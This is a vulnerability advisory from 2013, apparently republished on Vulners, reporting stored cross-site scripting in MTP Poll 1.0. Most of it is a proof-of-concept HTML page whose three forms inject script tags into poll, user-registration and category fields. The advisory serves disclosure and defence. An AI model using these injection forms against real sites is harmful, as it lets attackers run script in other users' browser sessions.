Lucene search
K

MTP Poll 1.0 Multiple Remote Script Insertion Vulnerabilities

🗓️ 25 Feb 2013 00:00:00Reported by Gjoko KrsticType 
zeroscience
 zeroscience
🔗 www.zeroscience.mk👁 30 Views

MTP Poll 1.0 multiple remote script insertion vulnerabilities. More than poll is a polling system with a powerful administration tool. It features multiple pools, templates, unlimited options, IP Logging, cookie support, and more

Code
<!--

MTP Poll 1.0 Multiple Remote Script Insertion Vulnerabilities


Vendor: MTP Scripts
Product web page: http://www.morephp.net
Affected version: 1.0

Summary: More than poll is a polling system with a powerful
administration tool. It features: multiple pools, templates,
unlimited options, IP Logging, cookie support, and more.

Desc: MTP Poll script suffers from multiple stored cross-site scripting
vulnerabilities. The issues are triggered when input passed via several
parameters to several scripts is not properly sanitized before being returned
to the user. This can be exploited to execute arbitrary HTML and script code
in a user's browser session in context of an affected site.

Tested on: Linux, Apache2


Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
                            @zeroscience


Advisory ID: ZSL-2013-5132
Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2013-5132.php


17.02.2013

--><html>
<head>
<title>MTP Poll 1.0 Multiple Remote Script Insertion Vulnerabilities</title>
</head>
<body><center>
<form action="http://localhost/poll_script/poll_add.php" method="POST">
<input name="question" type="hidden" value='"&gt;&lt;script&gt;alert(1);&lt;/script&gt;'/>
<input name="color[]" type="hidden" value="#8bc6e1"/>
<input name="answer[]" type="hidden" value='"&gt;&lt;script&gt;alert(2);&lt;/script&gt;'/>
<input name="img[]" type="hidden" value=""/>
<input name="status" type="hidden" value="1"/>
<input name="cat" type="hidden" value="0"/>
<input name="action" type="hidden" value="add"/>
<input type="submit" value="XSS #1"/>
</form>
<br/><br/>
<form action="http://localhost/poll_script/insert_user.php" method="POST">
<input name="ins_city" type="hidden" value='"&gt;&lt;script&gt;alert(3);&lt;/script&gt;'/>
<input name="ins_country" type="hidden" value="MK"/>
<input name="ins_email" type="hidden" value="[email protected]"/>
<input name="ins_fname" type="hidden" value='"&gt;&lt;script&gt;alert(4);&lt;/script&gt;'/>
<input name="ins_pass" type="hidden" value="thricerpass"/>
<input name="ins_username" type="hidden" value="thricer"/>
<input type="submit" value="XSS #2"/>
</form>
<br/><br/>
<form action="http://localhost/poll_script/ajax_cat_ins.php" method="POST">
<input name="name" type="hidden" value='"&gt;&lt;script&gt;alert(5);&lt;/script&gt;'/>
<input type="submit" value="XSS #3"/>
</form>
</center></body>
</html>

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation